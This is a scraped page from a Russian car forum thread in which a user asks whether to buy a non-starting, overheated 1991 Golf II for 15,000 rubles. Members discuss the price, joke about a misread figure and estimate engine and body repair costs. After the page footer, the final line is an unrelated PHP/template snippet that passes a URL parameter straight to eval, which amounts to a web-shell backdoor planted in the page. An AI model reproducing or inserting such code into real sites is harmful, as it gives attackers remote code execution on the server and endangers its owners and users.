+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 16

Тема: Брать или нет?


  1. #1
    Мимо проходил HeRion is on a distinguished road Аватар для HeRion
    Регистрация
    04.03.2012
    Откуда
    Тольятти
    Машина
    Golf II
    Сообщений
    2

    Question Брать или нет?

    Камрады помогите!
    Сегодня нашёл Golf II RP coupe 1.8 моновпрыск 1991г немного гнилые пороги,несильно побитый.
    По словам хозяина он стоит уже пол года,а стоит из за того что последний раз очень сильно перегрелся,он приехал домой,заглушил и больше не заводил боясь что заклинит двигатель.
    Попробовать завести наотрез отказывается,говорит что его сразу заклинит,мол я отдам ему деньги-тогда пожалуйста.
    Я начитался форумов и насколько понял самое страшное это деформация ГБО и поршневых колец.
    Скажите пожайлуста как можно увидеть что случилось?И стоит ли брать если он предлагает его со стоковыми колёсами за 15000р?Заранее спасибо:ok:
    фото прилагаю:

  2. #2
    GTI-Racing Rugby 14 will become famous soon enough Rugby 14 will become famous soon enough Аватар для Rugby 14
    Регистрация
    27.02.2010
    Откуда
    13 район
    Машина
    .:R MkVI
    Сообщений
    2,819
    я во 2-ых гольфах плохо разбираюсь, но посмотрев авто.ру, считаю, что 150 за гнилой авто, который не заводится - это дохера.
    вот за 160к гольф с бодрым кузовом, 1.6 литра и на ходу: http://cars.auto.ru/cars/used/sale/16469498-b6b3.html

    а вот за 130к 1,8 РП: http://cars.auto.ru/cars/used/sale/16422222-e8be76.html

    на гольф2 клубе спрашивал парней?
    Tough Guys Don`t Dance ©

    .:Revo St.2+

  3. #3
    GTI-Racing GIII will become famous soon enough Аватар для GIII
    Регистрация
    04.06.2007
    Откуда
    Москва
    Машина
    skoda octavia scout
    Сообщений
    920
    Цитата Сообщение от Rugby 14 Посмотреть сообщение
    я во 2-ых гольфах плохо разбираюсь, но посмотрев авто.ру, считаю, что 150 за гнилой авто, который не заводится - это дохера.
    вот за 160к гольф с бодрым кузовом и на ходу: http://cars.auto.ru/cars/used/sale/16469498-b6b3.html

    на гольф2 клубе спрашивал парней?
    Ты плохо нули посчитал. 15000р
    Skoda Octavia Scout APR StII: Intercooler APR, Carbonio Intake APR StI, Exhaust Downpipe APR, Bilstein B6, H&R Swaybars, brakes front S5, brakes rear S3, SRE Performance Clutch Kit, VWR Short Shifter

  4. #4
    I место Самые Интересные Диски 2011 White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice Аватар для White pony
    Регистрация
    18.05.2010
    Откуда
    Москва
    Машина
    Audi TT RS
    Сообщений
    1,900
    Цитата Сообщение от Rugby 14 Посмотреть сообщение
    я во 2-ых гольфах плохо разбираюсь, но посмотрев авто.ру, считаю, что 150 за гнилой авто, который не заводится - это дохера.
    вот за 160к гольф с бодрым кузовом, 1.6 литра и на ходу: http://cars.auto.ru/cars/used/sale/16469498-b6b3.html

    а вот за 130к 1,8 РП: http://cars.auto.ru/cars/used/sale/16422222-e8be76.html

    на гольф2 клубе спрашивал парней?
    Помидорчик, дай до завтра в долг 15000(0) рублей?)))) ты же не заставишь меня в долговой расписке прописать сумму прописью?
    If you wanna be rich
    You've got to be a bitch
    If you wanna ride
    Ride the White pony

    Enjoy yourself and fuck them all 0:-)

  5. #5
    GTI-Racing Rugby 14 will become famous soon enough Rugby 14 will become famous soon enough Аватар для Rugby 14
    Регистрация
    27.02.2010
    Откуда
    13 район
    Машина
    .:R MkVI
    Сообщений
    2,819
    Цитата Сообщение от GIII Посмотреть сообщение
    Ты плохо нули посчитал. 15000р
    ахахахаха. пасиб за поправку )) и пардоньте )))

    ну я бы за 15 рублей наверное взял бы :)

    Добавлено через 1 минуту
    Цитата Сообщение от White pony Посмотреть сообщение
    Помидорчик, дай до завтра в долг 15000(0) рублей?)))) ты же не заставишь меня в долговой расписке прописать сумму прописью?
    конечно не заставлю. я дам тебе 15тыс рублей, а потом допишу еще один нолик )))))))))
    Последний раз редактировалось Rugby 14; 05.03.2012 в 00:57. Причина: Добавлено сообщение
    Tough Guys Don`t Dance ©

    .:Revo St.2+

  6. #6
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    если 15 штук, то нормуль.... тыщ. 200 вложить с ремонтом движки и кузова и будет неплохой вариант........тем боле вместо ремонта в эти деньги, выгодней купить новый более мощный мотор )))
    Короче нужно смотреть, и подумать сколько еще есть денег. Если просто перебрать мотор, ну тут примерно 25-50 штук может выйти, а может и того меньше если вообще проблема не моторе и внутри, все еще походит.
    песок сыпется....не останавливайтесь на достигнутом !

  7. #7
    Купралётчик dimm is just really nice dimm is just really nice dimm is just really nice dimm is just really nice dimm is just really nice Аватар для dimm
    Регистрация
    19.03.2010
    Откуда
    Москва, Сочи
    Машина
    SEAT Leon Cupra Tribu - сток by OverLoad
    Сообщений
    1,939
    Купить его! Купить турбомотор.

  8. #8
    Мимо проходил HeRion is on a distinguished road Аватар для HeRion
    Регистрация
    04.03.2012
    Откуда
    Тольятти
    Машина
    Golf II
    Сообщений
    2
    спасибо всем за советы,как будут новости отпишу,а пока удачных всем праздников

  9. #9
    не бери , смысла нет . За 100 000 р - можно купить приличный и не вкладывать

  10. #10
    Мимо проходил sergiolev85 is on a distinguished road Аватар для sergiolev85
    Регистрация
    05.10.2012
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    1
    да ничего так машина. Я на таком год катался.

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Брать или нет?
    от Mr.Godlike в разделе Golf 7
    Ответов: 28
    Последнее сообщение: 02.10.2023, 12:40
  2. Golf GTI 7 брать или не брать?
    от Civic в разделе Отзывы / Выбор
    Ответов: 16
    Последнее сообщение: 06.03.2014, 10:56
  3. что брать?
    от Filya в разделе Отзывы / Выбор
    Ответов: 137
    Последнее сообщение: 23.04.2012, 16:51
  4. Golf 3 VR6 - брать или нет
    от Vitek_e в разделе Отзывы / Выбор
    Ответов: 2
    Последнее сообщение: 17.05.2010, 16:42
  5. Посоветуйте брать или не брать?
    от GrooveNK в разделе Отзывы / Выбор
    Ответов: 5
    Последнее сообщение: 11.02.2007, 12:07

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}